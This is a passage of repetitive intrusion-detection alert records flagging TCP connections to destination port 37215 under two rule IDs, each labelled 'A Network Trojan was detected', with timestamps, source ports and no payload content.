          Timestamp:06/09/24-16:33:36.036507
          SID:2829579
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929307
          SID:2835222
          Source Port:59960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644185
          SID:2829579
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168031
          SID:2835222
          Source Port:51112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288078
          SID:2835222
          Source Port:56132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645177
          SID:2835222
          Source Port:60510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035461
          SID:2835222
          Source Port:40802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861209
          SID:2835222
          Source Port:37502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694563
          SID:2835222
          Source Port:35844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206799
          SID:2835222
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245880
          SID:2835222
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131168
          SID:2835222
          Source Port:33798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269850
          SID:2829579
          Source Port:47860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945506
          SID:2835222
          Source Port:53182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988840
          SID:2829579
          Source Port:33562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398543
          SID:2829579
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719885
          SID:2835222
          Source Port:37838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696410
          SID:2829579
          Source Port:35500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398853
          SID:2829579
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164999
          SID:2829579
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928683
          SID:2835222
          Source Port:39522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168870
          SID:2829579
          Source Port:56636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987195
          SID:2829579
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004162
          SID:2835222
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398775
          SID:2835222
          Source Port:51774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944511
          SID:2829579
          Source Port:44194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821457
          SID:2829579
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821771
          SID:2835222
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645759
          SID:2829579
          Source Port:53782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822871
          SID:2835222
          Source Port:53552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949861
          SID:2835222
          Source Port:36450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156673
          SID:2829579
          Source Port:41598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925335
          SID:2835222
          Source Port:58512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469436
          SID:2835222
          Source Port:37704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468439
          SID:2829579
          Source Port:47976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719835
          SID:2835222
          Source Port:60306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720014
          SID:2829579
          Source Port:40310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032979
          SID:2835222
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563178
          SID:2829579
          Source Port:40588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915813
          SID:2829579
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894609
          SID:2829579
          Source Port:50096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296514
          SID:2829579
          Source Port:55144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241832
          SID:2835222
          Source Port:54246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890388
          SID:2829579
          Source Port:41826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163921
          SID:2829579
          Source Port:54588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593991
          SID:2829579
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417610
          SID:2829579
          Source Port:44640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165380
          SID:2835222
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158108
          SID:2829579
          Source Port:60696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306604
          SID:2835222
          Source Port:38160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606012
          SID:2829579
          Source Port:43816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026930
          SID:2835222
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716305
          SID:2829579
          Source Port:43670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225528
          SID:2835222
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945565
          SID:2829579
          Source Port:48236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645562
          SID:2829579
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952256
          SID:2835222
          Source Port:33140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894642
          SID:2835222
          Source Port:33302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718313
          SID:2835222
          Source Port:47572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035998
          SID:2835222
          Source Port:39578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465513
          SID:2835222
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396679
          SID:2835222
          Source Port:36916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035066
          SID:2829579
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101959
          SID:2829579
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160229
          SID:2835222
          Source Port:36010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028023
          SID:2835222
          Source Port:53336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905501
          SID:2835222
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289184
          SID:2829579
          Source Port:40104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296826
          SID:2829579
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866101
          SID:2835222
          Source Port:40616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246570
          SID:2829579
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942136
          SID:2829579
          Source Port:53748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645768
          SID:2835222
          Source Port:58724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400353
          SID:2829579
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160449
          SID:2829579
          Source Port:57350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540253
          SID:2829579
          Source Port:40154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225710
          SID:2835222
          Source Port:36872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944424
          SID:2835222
          Source Port:56528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163026
          SID:2835222
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820283
          SID:2829579
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399017
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133939
          SID:2829579
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720030
          SID:2835222
          Source Port:45820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823509
          SID:2829579
          Source Port:37492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719825
          SID:2829579
          Source Port:50192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563517
          SID:2835222
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931504
          SID:2829579
          Source Port:34610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292676
          SID:2829579
          Source Port:45572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419520
          SID:2829579
          Source Port:46212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287505
          SID:2829579
          Source Port:41350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398238
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224309
          SID:2835222
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163300
          SID:2829579
          Source Port:58412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034419
          SID:2829579
          Source Port:58778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921773
          SID:2835222
          Source Port:55482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030390
          SID:2829579
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247293
          SID:2835222
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919024
          SID:2829579
          Source Port:50340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397746
          SID:2835222
          Source Port:53918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716098
          SID:2835222
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037243
          SID:2829579
          Source Port:36096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004378
          SID:2829579
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595912
          SID:2835222
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946982
          SID:2829579
          Source Port:36666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989764
          SID:2829579
          Source Port:40566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420103
          SID:2829579
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163950
          SID:2835222
          Source Port:54006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895882
          SID:2829579
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924552
          SID:2829579
          Source Port:59216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036962
          SID:2829579
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564215
          SID:2835222
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226284
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924665
          SID:2835222
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948178
          SID:2835222
          Source Port:45620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950291
          SID:2829579
          Source Port:50508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168766
          SID:2835222
          Source Port:36892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651336
          SID:2835222
          Source Port:57432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082683
          SID:2829579
          Source Port:46396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398222
          SID:2835222
          Source Port:42772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867344
          SID:2835222
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916593
          SID:2829579
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102904
          SID:2829579
          Source Port:39356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031994
          SID:2835222
          Source Port:60148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469326
          SID:2829579
          Source Port:42858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465399
          SID:2829579
          Source Port:43758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168302
          SID:2829579
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996267
          SID:2829579
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719469
          SID:2829579
          Source Port:37452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288245
          SID:2829579
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644668
          SID:2829579
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465451
          SID:2835222
          Source Port:50228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223112
          SID:2835222
          Source Port:55134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597413
          SID:2829579
          Source Port:39248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416343
          SID:2829579
          Source Port:42508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991262
          SID:2835222
          Source Port:33832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914810
          SID:2829579
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165738
          SID:2829579
          Source Port:43792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035107
          SID:2829579
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645949
          SID:2835222
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417581
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718900
          SID:2835222
          Source Port:53000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251392
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162822
          SID:2835222
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207782
          SID:2835222
          Source Port:57324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904553
          SID:2835222
          Source Port:55666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206215
          SID:2835222
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864400
          SID:2835222
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719354
          SID:2829579
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028245
          SID:2829579
          Source Port:33284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894555
          SID:2829579
          Source Port:59772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028664
          SID:2829579
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230352
          SID:2829579
          Source Port:46348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078087
          SID:2829579
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278981
          SID:2829579
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720099
          SID:2835222
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288909
          SID:2829579
          Source Port:60994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075774
          SID:2829579
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302418
          SID:2829579
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558253
          SID:2835222
          Source Port:53044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867176
          SID:2829579
          Source Port:38510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946873
          SID:2829579
          Source Port:33874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557654
          SID:2835222
          Source Port:42286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397805
          SID:2835222
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158245
          SID:2835222
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277387
          SID:2829579
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206911
          SID:2829579
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676164
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243670
          SID:2835222
          Source Port:60664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413517
          SID:2835222
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823214
          SID:2835222
          Source Port:49910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920393
          SID:2829579
          Source Port:39036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417462
          SID:2835222
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867781
          SID:2835222
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414684
          SID:2835222
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169756
          SID:2835222
          Source Port:41804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418832
          SID:2829579
          Source Port:34870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244949
          SID:2835222
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296425
          SID:2835222
          Source Port:46448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289176
          SID:2829579
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538223
          SID:2835222
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987283
          SID:2829579
          Source Port:42790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647741
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104299
          SID:2835222
          Source Port:48664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466999
          SID:2829579
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275565
          SID:2835222
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164866
          SID:2835222
          Source Port:41212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093304
          SID:2829579
          Source Port:41046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473642
          SID:2829579
          Source Port:56068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563412
          SID:2829579
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724315
          SID:2829579
          Source Port:56440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539953
          SID:2835222
          Source Port:52368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478853
          SID:2829579
          Source Port:52664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644633
          SID:2835222
          Source Port:33454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987107
          SID:2835222
          Source Port:58516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082072
          SID:2829579
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292420
          SID:2835222
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167991
          SID:2835222
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397903
